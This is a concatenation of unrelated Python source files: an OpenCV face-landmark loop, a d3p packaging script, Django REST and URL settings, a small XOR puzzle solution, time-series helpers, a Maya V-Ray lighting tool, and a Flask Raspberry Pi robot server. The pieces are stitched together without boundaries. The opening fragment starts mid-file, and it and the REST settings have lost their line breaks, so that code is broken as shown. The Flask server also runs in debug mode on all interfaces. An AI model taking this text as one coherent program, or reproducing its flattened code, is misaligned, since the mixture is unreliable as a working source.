resize # it, and convert it to grayscale # channels) frame = vs.read() frame = imutils.resize(frame, width=450) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # detect faces in the grayscale frame rects = detector(gray, 0) # loop over the face detections for rect in rects: # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array shape = predictor(gray, rect) shape = face_utils.shape_to_np(shape) # extract the left and right eye coordinates, then use the # coordinates to compute the eye aspect ratio for both eyes mouth = shape[mStart:mEnd] mouth_open_dist = mouth_openness(mouth) #mouth_inner_open_dist = mouth_openness(mouth, outer_lips=False) # compute the convex hull for the left and right eye, then # visualize each of the eyes mouthHull = cv2.convexHull(mouth) cv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1) # draw the computed mouth openness for the frame cv2.putText(frame, "Outer Lips Dist: {:.2f}".format(mouth_open_dist), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) # show the frame cv2.imshow("Frame", frame) key = cv2.waitKey(1) & 0xFF # if the `q` key was pressed, break from the loop if key == ord("q"): break # do a bit of cleanup cv2.destroyAllWindows() vs.stop()
# Packaging metadata for the d3p library (Differentially-Private Probabilistic
# Programming), installed via setuptools.
from __future__ import absolute_import, division, print_function

import os
import sys

from setuptools import find_packages, setup

# Absolute directory containing this setup script.
# NOTE(review): PROJECT_PATH and the sys import are unused in this snippet --
# possibly leftovers from a README-loading step; confirm before removing.
PROJECT_PATH = os.path.dirname(os.path.abspath(__file__))

setup(
    name='d3p',
    python_requires='>=3.6',
    version='0.2.0-devel',
    description='Differentially-Private Probabilistic Programming',
    # Ship only the d3p package and its subpackages, not tests/examples.
    packages=find_packages(include=['d3p', 'd3p.*']),
    author='PADS @ Helsinki University and Aalto University',
    install_requires=[
        'numpyro >= 0.4.0, < 0.6.0',
        'fourier-accountant >= 0.12.0, < 1.0.0'
    ],
    # Optional extras: `pip install d3p[examples]` pulls in plotting support.
    extras_require={
        'examples': ['matplotlib'],
    },
    long_description="",
    long_description_content_type='text/markdown',
    tests_require=[],
    test_suite='tests',
    keywords='probabilistic machine learning bayesian statistics differential-privacy',
    classifiers=[
        'Intended Audience :: Developers',
        'Intended Audience :: Education',
        'Intended Audience :: Science/Research',
        'Operating System :: POSIX :: Linux',
        'Operating System :: MacOS :: MacOS X',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
    ],
)
# https://github.com/encode/django-rest-framework import datetime REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework_jwt.authentication.JSONWebTokenAuthentication', 'rest_framework.authentication.SessionAuthentication', ), 'DEFAULT_PERMISSION_CLASSES': ('apps.api.v1.permissions.ObjectPermissions',), 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',), 'DEFAULT_FILTER_BACKENDS': ( 'django_filters.rest_framework.DjangoFilterBackend', 'rest_framework_guardian.filters.DjangoObjectPermissionsFilter', 'rest_framework.filters.SearchFilter', 'rest_framework.filters.OrderingFilter', ), 'DEFAULT_THROTTLE_RATES': {}, 'OVERIDE_THROTTLE_RATES': {}, 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', 'PAGE_SIZE': 10, 'EXCEPTION_HANDLER': 'apps.api.v1.exceptions.exception_handler', }
# URL routes for the games app: catalog, search, purchases, play/score/state,
# and the user's library.
from django.urls import path, include
from .views import (
    game_details, games, game_state, manage_game, library, uploads, play,
    save_score, purchase_game, search, autosuggestion_search,
    autosuggestion_search_library
)

urlpatterns = [
    path('', games, name='games'),
    # NOTE(review): both search routes share name='search' -- reverse('search')
    # resolves only to the last one registered; confirm this is intended.
    path('search/', search, name='search'),
    path('library/search/', search, name='search'),
    # Autosuggestion endpoints for the two search boxes (store vs. library).
    path('search/search-term/', autosuggestion_search, name='autosuggestion'),
    path('library/search/search-term/', autosuggestion_search_library, name='autosuggestion_library'),
    path('<int:game_id>/', game_details, name='game_details'),
    path('<int:game_id>/purchase/', purchase_game, name='purchase_game'),
    # manage_game serves both add (no id) and edit (with id) flows.
    path('add/', manage_game, name='add_game'),
    path('uploads/', uploads, name='uploads'),
    path('<int:game_id>/play/', play, name='play'),
    path('<int:game_id>/save-score/', save_score, name='save_score'),
    path('<int:game_id>/state/', game_state, name='game_state'),
    path('library/', library, name='library'),
    path('<int:game_id>/edit/', manage_game, name='edit_game'),
    # Per-game review routes are delegated to the review app.
    path('<int:game_id>/review/', include('apps.review.urls')),
]
# For each test case: read n and n data rows, then print n XOR 1 XOR 2 ... XOR (n-1).
num_cases = int(input())
for _case in range(num_cases):
    n = int(input())
    # The n rows must be consumed from stdin even though their values are unused.
    rows = [input().split() for _ in range(n)]
    answer = n
    for k in range(1, n):
        answer ^= k
    print(answer)
# Helpers for building per-day / per-week training matrices from a half-hourly
# time-series DataFrame (48 slots per day), plus small statistics utilities.
import numpy as np
import pandas as pd
import sklearn as sk
from sklearn.model_selection import TimeSeriesSplit
import matplotlib.pyplot as plt
import matplotlib
matplotlib.style.use('ggplot')
from datetime import datetime, date

# Known gaps in the recorded data: any week overlapping one of these
# (start, end) ranges is treated as missing (filled with NaN below).
# NOTE(review): this module-level list is shadowed by identical local copies
# inside create_day_matrix / create_week_matrix -- they could share this one.
empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)),
(datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)),
(datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)),
(datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)),
(datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)),
(datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)),
(datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)),
(datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)),
(datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)),
(datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)),
(datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)),
(datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))]


def rolling_stats(Aprime, method = "flat", decay = 0.01):
    """Return (mean, variance) of Aprime.

    method == "flat": plain sample mean and (N-1)-normalized variance.
    Otherwise: exponentially weighted mean/variance with weight
    exp(-decay * i) on element i (earlier elements weigh more).
    """
    A = np.array(Aprime)
    N = np.size(A)
    rolling_mean = 0
    rolling_var = 0
    if method == "flat":
        rolling_mean = np.sum(A) / N
        rolling_var = np.sum((A - rolling_mean)**2) / (N - 1)
    else:
        weights = np.exp(- decay * np.array(range(0, N)))
        B = A * weights
        rolling_mean = np.sum(B) / np.sum(weights)
        C = (A - rolling_mean)**2 * weights
        rolling_var = np.sum(C) / np.sum(weights)
    return rolling_mean, rolling_var


def approx_svd(mat, k):
    """Return the rank-k SVD reconstruction of mat (best rank-k approximation)."""
    U,s,V = np.linalg.svd(mat, full_matrices=False)
    S = np.diag(s[0:k])
    return np.dot(U[:,0:k], np.dot(S, V[0:k,:]))


def create_training_xy_day(df_week):
    '''
    Create the matrix X and Y for the ML algorithms.
    Create here an Y corresponding to an entire day

    X row w = the full week w; Y row w = the last day (48 slots) of week w+1.
    Rows containing NaN in either the input week or the target day are skipped.
    '''
    X = np.array([])
    Y = np.array([])
    for w in range(0,len(df_week)-1):
        # only keep pairs where both the feature week and target day are complete
        if np.sum(np.isnan(df_week[w]))==0 and np.sum(np.isnan(df_week[w+1,-48:]))==0:
            if len(X)==0:
                X = np.array([df_week[w]])
                Y = np.array([df_week[w+1,-48:]])
            else:
                X = np.append(X, [df_week[w]], axis=0)
                Y = np.append(Y, [df_week[w+1,-48:]], axis=0)
    return X,Y


def create_training_xy_hour(df_week, hour, minute):
    '''
    Create the matrix X and Y for the ML algorithms.
    Create here an Y corresponding to a unique slot

    Same as create_training_xy_day, but Y is the single half-hour slot at
    (hour, minute) of the last day of week w+1.
    '''
    X = np.array([])
    Y = np.array([])
    for w in range(0,len(df_week)-1):
        if np.sum(np.isnan(df_week[w]))==0 and np.sum(np.isnan(df_week[w+1,-48:]))==0:
            if len(X)==0:
                X = np.array([df_week[w]])
                # -48 is the start of the last day; 2*hour + minute//30 indexes the slot
                Y = np.array([df_week[w+1,-48+2*hour+int(minute/30)]])
            else:
                X = np.append(X, [df_week[w]], axis=0)
                Y = np.append(Y, df_week[w+1,-48+2*hour+int(minute/30)])
    return X,Y


def create_day_matrix(df, weekday, day_max = -1):
    '''
    Create the matrix where a row corresponds to the day of the week equaling weekday, and each column to a time slot

    df is indexed by half-hourly timestamps (48 slots/day).  Days falling in a
    known empty week become NaN rows; other incomplete days become zero rows.
    day_max (a date) optionally truncates the scan; -1 means no limit.
    '''
    result=np.array([])
    # we start at week 1 of 2011 (skip the first two days = 96 half-hour slots)
    dates = df.index[96:]
    first_day = dates[0].weekday()
    # advance to the first occurrence of the requested weekday
    decal = (7-first_day+weekday)%7
    first_day = dates[decal*48]
    last_day = dates[-1].date()
    empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)),
    (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)),
    (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)),
    (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)),
    (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)),
    (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)),
    (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)),
    (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)),
    (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)),
    (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)),
    (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)),
    (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))]
    while True:
        if first_day.date()>=last_day or (day_max != -1 and first_day.date()>=day_max):
            break
        # one day of data as a row vector; fill small gaps by back/forward fill
        arr = np.array(df.loc[first_day:first_day+pd.Timedelta('1 day')][:-1].fillna(method="bfill").fillna(method="ffill").transpose().values)
        if np.sum(np.isnan(arr)) >0:
            # still incomplete after filling -> zero out the whole day
            arr = np.zeros(shape=arr.shape)
        for (d1,d2) in empty_weeks:
            if first_day>=d1 and first_day<d2:
                # day falls in a known data gap -> mark as NaN
                arr = np.nan*np.zeros(shape=arr.shape)
        if len(result) == 0:
            result = arr
        else:
            result = np.append(result, arr, axis=0)
        first_day+=pd.Timedelta('7 day')
    return result


def create_week_matrix(df, weekday, day_max = -1):
    '''
    Create the matrix where a row corresponds to an entire week, and each column to a time slot

    Weeks are aligned so each row ends on the requested weekday (see the
    weekday+=1 shift below).  day_max (a date) optionally truncates the scan.
    '''
    #for a monday, we go from tuesday to monday
    weekday+=1
    result=np.array([])
    # we start at week 1 of 2011 (skip the first day = 48 half-hour slots)
    dates = df.index[48:]
    first_day = dates[0].weekday()
    decal = (7-first_day+weekday)
    first_day = dates[decal*48]
    last_day = dates[-1].date()
    # NOTE(review): duplicated module-level list; also unused in this function.
    empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)),
    (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)),
    (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)),
    (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)),
    (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)),
    (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)),
    (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)),
    (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)),
    (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)),
    (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)),
    (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)),
    (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))]
    while True:
        if (first_day+pd.Timedelta('6 day')).date()>=last_day or (day_max != -1 and (first_day+pd.Timedelta('6 day')).date()>=day_max):
            break
        # one full week of data as a row vector (no NaN filling here)
        arr = np.array(df.loc[first_day:first_day+pd.Timedelta('7 day')][:-1].transpose().values)
        if len(result) == 0:
            result = arr
        else:
            result = np.append(result, arr, axis=0)
        first_day+=pd.Timedelta('7 day')
    return result


# Commented-out variant kept for reference: builds week matrices starting at an
# arbitrary (weekday, hour, min) slot instead of midnight.
# def create_week_matrix_from_slots(df, weekday, hour, min):
#     '''
#     Create the matrix where a row corresponds to an entire week, starting at a precise time slot, and each column to a time slot
#     '''
#     result=np.array([])
#     dates = df.index
#     first_day = dates[0].weekday()
#     decal = (7-first_day+weekday)%7
#     print("Decal: "+str(decal*48+2*hour+int(min/30)))
#     first_day = dates[decal*48+2*hour+int(min/30)]
#     last_day = dates[-7*48].date()
#     print(first_day)
#     empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)),
#     (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)),
#     (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)),
#     (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)),
#     (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)),
#     (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)),
#     (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)),
#     (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)),
#     (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)),
#     (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)),
#     (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)),
#     (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))]
#
#     while True:
#         if (first_day+pd.Timedelta('7 day')).date()>last_day:
#             break
#         arr = np.array(df.loc[first_day:first_day+pd.Timedelta('7 day')][:-1].fillna(method="bfill").fillna(method="ffill").transpose().values)
#         if np.sum(np.isnan(arr)) >0:
#             arr = np.zeros(shape=arr.shape)
#         for (d1,d2) in empty_weeks:
#             if (first_day>=d1 and first_day<d2) or (first_day+pd.Timedelta('7 day')>=d1 and first_day+pd.Timedelta('7 day')<d2):
#                 arr = np.nan*np.zeros(shape=arr.shape)
#
#         if len(result) == 0:
#             result = arr
#         else:
#             result = np.append(result, arr, axis=0)
#
#         first_day+=pd.Timedelta('7 day')
#     return result
# Maya (Python 2) lighting-setup tool for the "Bigfoot" show: organizes the
# scene outliner into groups with V-Ray object properties, creates utility
# shaders and render elements, and reports what it did in a simple UI.
import os, re, sys, logging
import maya.cmds as cmds
import maya.mel as mel
import mVray.vrayObjectProperties as vop
import mVray.vrayFrameBuffers as vfb
import dloUtils
reload(dloUtils)
import assetSetup
reload(assetSetup)

######## UI Window ########
class bfSetupMessengerUI():
    """Scrollable results window listing every action runSetup() performed."""
    def __init__(self):
        winTile = "bfSetupMessengerUI"
        win = dloUtils.dloUIWindow(winTile, "Bigfoot Lighting Setup Messenger", 750, 650, 1)
        form = cmds.formLayout(p=win, bgc=(.2, .2, .2))
        # runSetup() appends messages into this named scroll list after the
        # window is created.
        messageScrlList = cmds.textScrollList("bfMessageScrollList", p=form)
        okBn = cmds.button(p=form, c="cmds.deleteUI('bfSetupMessengerUI')", bgc=(.4, .4, .4), l="Ok", w=80)
        cmds.formLayout(form, e=1, ac=[(messageScrlList, "bottom", 10, okBn)], af=[(messageScrlList, "top", 10), (messageScrlList, "left", 10), (messageScrlList, "right", 10)])
        cmds.formLayout(form, e=1, af=[(okBn, "bottom", 10), (okBn, "left", 10), (okBn, "right", 10)])
        dloUtils.dloEvokeUI(winTile, win, 800, 650)

############################
######## runSetup() ########
############################
def runSetup():
    """Entry point: run the full scene setup and show the results UI."""
    msgs = []
    # Set default render layer as active layer
    cmds.editRenderLayerGlobals(currentRenderLayer='defaultRenderLayer')
    # Make sure vray plugin is loaded
    if cmds.pluginInfo('vrayformaya', q=True, loaded=True) == False:
        cmds.loadPlugin('vrayformaya', qt=True)
    # Kick some ass
    organizeScene(msgs)
    createUtilShaders(msgs)
    createRenderElements(msgs)
    # dlo asset setup
    assetMsgs = assetSetup.dloAssetSetup()
    if assetMsgs:
        msgs.extend(assetMsgs)
    # Display UI with results
    if len(msgs):
        bfSetupMessengerUI()
        for msg in msgs:
            cmds.textScrollList("bfMessageScrollList", e=1, a=msg)

######## Utility to determine currently set sequence ########
def getSeq():
    """Return the current sequence code from the M_SEQUENCE env var ('' if unset)."""
    return os.getenv("M_SEQUENCE", "")

######## Utility to log progress ########
def logInfo(infoString, accumulatedInfo=[]):
    """Print infoString and append it to accumulatedInfo.

    NOTE(review): mutable default argument -- calls that omit accumulatedInfo
    share one list across calls.  All call sites here pass msgs explicitly,
    so the default is never exercised; confirm before changing.
    """
    print infoString
    accumulatedInfo.append(infoString)

######## Utility to set up a group and vrayObjectProperties ########
def updateGroupAndVop(searchList, groupName, vopName, msgs):
    """Parent nodes matching searchList under groupName (creating it if
    needed) and ensure a vrayObjectProperties node vopName exists for it."""
    nodes = cmds.ls(searchList, assemblies=True)
    groupNode = cmds.ls(groupName)
    vopNode = cmds.ls(vopName)
    if nodes:
        if groupNode:
            cmds.parent(nodes, groupNode)
            logInfo('Added to group %s: %s' % (groupNode, nodes), msgs)
        else:
            groupNode = cmds.group(nodes, name=groupName)
            logInfo('Created group %s containing %s' % (groupNode, nodes), msgs)
    if not vopNode:
        if groupNode:
            vopNode = vop.createObjectProperties(groupNode, vopName)
            logInfo('Created vrayObjectProperties %s containing %s' % (vopNode, groupNode), msgs)

######## Organize Outliner and Create Object Properties ########
def organizeScene(msgs=[]):
    """Group every known asset category (by name pattern) and attach a
    vrayObjectProperties node to each group; actions are logged into msgs."""
    # Trackman
    trackmanSearchList = ["trackman*:*", "pymSuit*:*"]
    updateGroupAndVop(trackmanSearchList, 'TRACKMAN_GRP', 'trackman_VOP', msgs)
    # Tracking Geo
    trackSearchList = ["*:*__track__*", "pymGuestRoom*:*"]
    updateGroupAndVop(trackSearchList, 'TRACK_GEO_GRP', 'track_geo_VOP', msgs)
    # Roots
    rootSearchList = ["*Heroroots*:*", "*Heroroots*_VRayFurPreviewTm"]
    updateGroupAndVop(rootSearchList, 'ROOTS_GRP', 'roots_VOP', msgs)
    # Tunnel
    tunnelSearchList = ["tunnel*:*", "env_tunnelDressing_*_Instancer_*"]
    updateGroupAndVop(tunnelSearchList, 'TUNNEL_GRP', 'tunnel_VOP', msgs)
    # Ants
    antSearchList = ["carpenterAnt*:*", "char_carpenterAnt*_Instancer_*",
                     "bulletAnt*:*", "char_bulletAnt*_Instancer_*",
                     "crazyAnt*:*", "char_crazyAnt*_Instancer_*",
                     "fireAnt*:*", "char_fireAnt*_Instancer_*",]
    updateGroupAndVop(antSearchList, 'ANTS_GRP', 'ants_VOP', msgs)
    # Sugar Cubes
    sugarcubeSearchList = ["sugarcube*:*", "*sugarcube*_Instancer*"]
    updateGroupAndVop(sugarcubeSearchList, 'SUGARCUBES_GRP', 'sugarcubes_VOP', msgs)
    # Antman
    updateGroupAndVop(["antman*:*"], 'ANTMAN_GRP', 'antman_VOP', msgs)
    # Wasp
    updateGroupAndVop(["wasp*:*"], 'WASP_GRP', 'wasp_VOP', msgs)
    # Yellowjacket
    updateGroupAndVop(["yellowJacket*:*"], 'YELLOWJACKET_GRP', 'yellowjacket_VOP', msgs)
    # Missile
    updateGroupAndVop(["missile*:*"], 'MISSILE_GRP', 'missile_VOP', msgs)

######## Util Shaders Creation ##################################
def createUtilShaders(msgs=[]):
    """Create the standard utility shaders (RGB emitters, matte black,
    shadow catcher, mirror, contact-shadow occlusion) if they don't exist."""
    if not cmds.objExists('RED'):
        redMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='RED')
        cmds.setAttr('%s.color' % (redMtl), 1,0,0, type='double3')
        cmds.setAttr('%s.emitOnBackSide' % (redMtl), 1)
        logInfo('Created RED shader', msgs)
    if not cmds.objExists('GREEN'):
        greenMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='GREEN')
        cmds.setAttr('%s.color' % (greenMtl), 0,1,0, type='double3')
        cmds.setAttr('%s.emitOnBackSide' % (greenMtl), 1)
        logInfo('Created GREEN shader', msgs)
    if not cmds.objExists('BLUE'):
        blueMtl = cmds.shadingNode('VRayLightMtl', asShader=True, name='BLUE')
        cmds.setAttr('%s.color' % (blueMtl), 0,0,1, type='double3')
        cmds.setAttr('%s.emitOnBackSide' % (blueMtl), 1)
        logInfo('Created BLUE shader', msgs)
    if not cmds.objExists('BLACK'):
        blackMtl = cmds.shadingNode('VRayMtl', asShader=True, name='BLACK')
        cmds.setAttr('%s.color' % (blackMtl), 0,0,0, type='double3')
        cmds.setAttr('%s.reflectionColorAmount' % (blackMtl), 0)
        cmds.setAttr('%s.diffuseColorAmount' % (blackMtl), 0)
        logInfo('Created BLACK shader', msgs)
    if not cmds.objExists('SHADOW_CATCHER'):
        shdCatcher = cmds.shadingNode('VRayMtl', asShader=True, name='SHADOW_CATCHER')
        cmds.setAttr('%s.reflectionColorAmount' % (shdCatcher), 0)
        cmds.setAttr('%s.diffuseColorAmount' % (shdCatcher), 1)
        cmds.setAttr('%s.brdfType' % (shdCatcher), 0)
        logInfo('Created SHADOW_CATCHER shader', msgs)
    if not cmds.objExists('MIRROR'):
        # Pure mirror with occlusion-driven reflection color.
        mirrorMtl = cmds.shadingNode('VRayMtl', asShader=True, name='MIRROR')
        cmds.setAttr('%s.color' % (mirrorMtl), 0,0,0, type='double3')
        cmds.setAttr('%s.reflectionColor' % (mirrorMtl), 1,1,1, type='double3')
        cmds.setAttr('%s.reflectionColorAmount' % (mirrorMtl), 1)
        cmds.setAttr('%s.diffuseColorAmount' % (mirrorMtl), 0)
        cmds.setAttr('%s.useFresnel' % (mirrorMtl), 0)
        mirrorOccl = cmds.shadingNode('VRayDirt', asTexture=True, name='MIRROR_OCCLUSION')
        cmds.setAttr('%s.blackColor' % (mirrorOccl), 1,1,1, type='double3')
        cmds.setAttr('%s.whiteColor' % (mirrorOccl), 0,0,0, type='double3')
        cmds.setAttr('%s.radius' % (mirrorOccl), 1000)
        cmds.setAttr('%s.occlusionMode' % (mirrorOccl), 2)
        cmds.connectAttr('%s.outColor' % (mirrorOccl), '%s.reflectionColor' % (mirrorMtl))
        logInfo('Created MIRROR shader', msgs)
    if not cmds.objExists('CONTACT_SHAD_OCCL'):
        # Short-radius occlusion texture used as a contact-shadow pass; a set
        # drives which objects are excluded from casting.
        contactShadOccl = cmds.shadingNode('VRayDirt', asTexture=True, name='CONTACT_SHAD_OCCL')
        cmds.setAttr('%s.blackColor' % (contactShadOccl), 1,1,1, type='double3')
        cmds.setAttr('%s.whiteColor' % (contactShadOccl), 0,0,0, type='double3')
        cmds.setAttr('%s.radius' % (contactShadOccl), 2)
        cmds.setAttr('%s.ignoreSelfOcclusion' % (contactShadOccl), 1)
        cmds.setAttr('%s.resultAffectInclusive' % (contactShadOccl), 0)
        contactShadNonCastSet = cmds.sets(name='contactShadNonCastSet')
        cmds.connectAttr('%s.usedBy' % (contactShadNonCastSet), '%s.resultAffect' % (contactShadOccl))
        logInfo('Created CONTACT_SHAD_OCCL texture', msgs)
    # Plate-projection shaders are imported for every sequence except 'bak'.
    if (getSeq() != 'bak') and (not cmds.objExists('BG_PROJ')):
        cmds.file("/jobs/vfx_bf/TASKS/light/maya/renderData/shaders/bf_light_plateProjectionShaders_v0002.mb", i=True)
        logInfo('Imported BG_PROJ and BLACK_PROJ shaders (if your shot has a plate, connect shot camera to BG_CAMERA_PROJECTION and add plate path to BG_PLATE)', msgs)

################ Render Elements Creation ###########################################
def createRenderElements(msgs=[]):
    """Create the matte-shadow and contact-shadow render elements (disabled)."""
    if not cmds.objExists('vrayRE_MatteShadow'):
        vfb.matteShadow('vrayRE_MatteShadow', enabled=False)
        logInfo('Created vray render element vrayRE_MatteShadow', msgs)
    if not cmds.objExists('vrayRE_ContactShadow'):
        if cmds.objExists('CONTACT_SHAD_OCCL'):
            vfb.extraTex('vrayRE_ContactShadow', 'CONTACT_SHAD_OCCL', explicit_channel='contactShadow', enabled=False)
            logInfo('Created vray render element vrayRE_ContactShadow', msgs)

######## Ref Spheres Setup ########
def refSphereSetup():
    """Import the reference-spheres/color-chart rig and park it 50 units in
    front of the shot camera (via a throwaway parent constraint)."""
    refSphereNode = 'REF_SPHERES_COLORCHART'
    shotCamNode = 'shotcam1:shot_camera'
    cmds.editRenderLayerGlobals(currentRenderLayer='defaultRenderLayer')
    if not cmds.objExists(refSphereNode):
        cmds.file('/jobs/vfx_bf/TECH/lib/maya/presets/lightRigs/REF_SPHERES_COLORCHART/v0002/lightRig.ma', i=True)
    if cmds.objExists(shotCamNode):
        constraintNode = cmds.parentConstraint(shotCamNode, refSphereNode)
        if constraintNode:
            constraintNode = constraintNode[0]
            # offset the rig in front of the camera, facing it, then bake by
            # deleting the constraint (the transform values remain)
            cmds.setAttr('%s.target[0].targetOffsetTranslate' % (constraintNode), 0, 0, -50)
            cmds.setAttr('%s.target[0].targetOffsetRotate' % (constraintNode), 0, 180, 0)
            cmds.delete(constraintNode)
# Flask web server for a Raspberry Pi robot: serves status pages (temperature,
# CPU), an MJPEG camera stream, and GPIO endpoints that drive three motor pins.
import os
import time
import datetime
from importlib import import_module
from flask import Flask, render_template, Response, request
import psutil  # sudo pip3 install psutil

import RPi.GPIO as GPIO

# GPIO.getmode()
# Motor control pins (BOARD numbering).  All start LOW (motors off).
GPIO.setmode(GPIO.BOARD)
right = 37
left = 35
back = 38
GPIO.setup(left, GPIO.OUT)
GPIO.setup(right, GPIO.OUT)
GPIO.setup(back, GPIO.OUT)
GPIO.output(left, GPIO.LOW)
GPIO.output(right, GPIO.LOW)
GPIO.output(back, GPIO.LOW)

# import camera driver: CAMERA env var selects camera_<name>.Camera,
# otherwise fall back to the default camera module.
if os.environ.get('CAMERA'):
    Camera = import_module('camera_' + os.environ['CAMERA']).Camera
else:
    from camera import Camera
    # Raspberry Pi camera module (requires picamera package)
    # from camera_pi import Camera


def measure_temp():
    """Return the SoC temperature string from vcgencmd, e.g. "48.3'C\\n"."""
    temp = os.popen("vcgencmd measure_temp").readline()
    return (temp.replace("temp=", ""))


def get_cpu_usage():
    """Return the system-wide CPU usage percentage as a string."""
    # return str(os.popen("top -n1 | awk '/Cpu\(s\):/ {print $2}'").readline().strip(\))
    cpu_usage = psutil.cpu_percent()
    return (str(cpu_usage))
    # return ("2")


app = Flask(__name__)


@app.route("/")
def index():
    """Landing page with current date/time."""
    now = datetime.datetime.now()
    dateStr = now.strftime("%Y-%m-%d")
    timeStr = now.strftime("%H:%M:%S")
    templateData = {
        "title": "RPi Infos",
        "date": dateStr,
        "timeJS": timeStr}
    return render_template('t_index.html', **templateData)


@app.route("/temp")
def temp():
    """Page showing the Pi's SoC temperature."""
    data = ["Temperature", "RPi temperature: ", measure_temp()]
    return render_template('t_temp.html', data=data)


@app.route("/cpu")
def cpu():
    """Page showing current CPU usage."""
    data = ["CPU Page", "CPU usage: ", get_cpu_usage()]
    return render_template('t_cpu.html', data=data)


@app.route('/stream')
def stream():
    """Video streaming home page."""
    #for pin in pins:
    #    pins[pin]['state'] = GPIO.input(pin)
    # Put the pin dictionary into the template data dictionary:
    #templateData = {
    #    'pins' : pins}
    #return render_template('stream2.html',**templateData)
    return render_template('stream2.html')


def gen(camera):
    """Video streaming generator function: yields MJPEG multipart chunks forever."""
    while True:
        frame = camera.get_frame()
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')


@app.route('/stream/video_feed')
def video_feed():
    """Video streaming route. Put this in the src attribute of an img tag."""
    return Response(gen(Camera()),
                    mimetype='multipart/x-mixed-replace; boundary=frame')


#@app.route('/setGPIO', methods=['POST','GET'])
@app.route('/setGPIO/<what>', methods=['POST'])
def setGPIO(what):
    """Drive the motor pins according to the command in the URL.

    Commands: forwardstart, forwardstop, left, right, back; anything else
    stops all motors.  Returns a human-readable status of the left pin.
    NOTE(review): the bare "" lines below are no-op string expressions,
    presumably visual branch separators -- they have no runtime effect.
    """
    if what == 'forwardstart':
        GPIO.output(left,GPIO.HIGH)
        GPIO.output(right,GPIO.HIGH)
        ""
    elif what == 'forwardstop':
        GPIO.output(left,GPIO.LOW)
        GPIO.output(right,GPIO.LOW)
        GPIO.output(back,GPIO.LOW)
        ""
    elif what == 'left':
        GPIO.output(left,GPIO.HIGH)
        GPIO.output(right,GPIO.LOW)
        ""
    elif what == 'right':
        GPIO.output(left,GPIO.LOW)
        GPIO.output(right,GPIO.HIGH)
        ""
    elif what == 'back':
        GPIO.output(back,GPIO.HIGH)
        #GPIO.output(left,GPIO.LOW)
        #GPIO.output(right,GPIO.HIGH)
        ""
    else:
        # unknown command -> all stop
        GPIO.output(left,GPIO.LOW)
        GPIO.output(right,GPIO.LOW)
        GPIO.output(back,GPIO.LOW)
        ""
    if (GPIO.input(left) == 0):
        answer = "GPIO13 is OFF"
    else:
        answer = "GPIO13 is ON"
    return answer


@app.route('/checkGPIO', methods=['GET'])
def checkGPIO():
    """Report whether the left motor pin is currently driven."""
    if (GPIO.input(left) == 0):
        answer = "GPIO13 is OFF"
    else:
        answer = "GPIO13 is ON"
    return answer
    #return "Hello"


if __name__ == "__main__":
    app.run(host='0.0.0.0',debug=True,threaded=True)
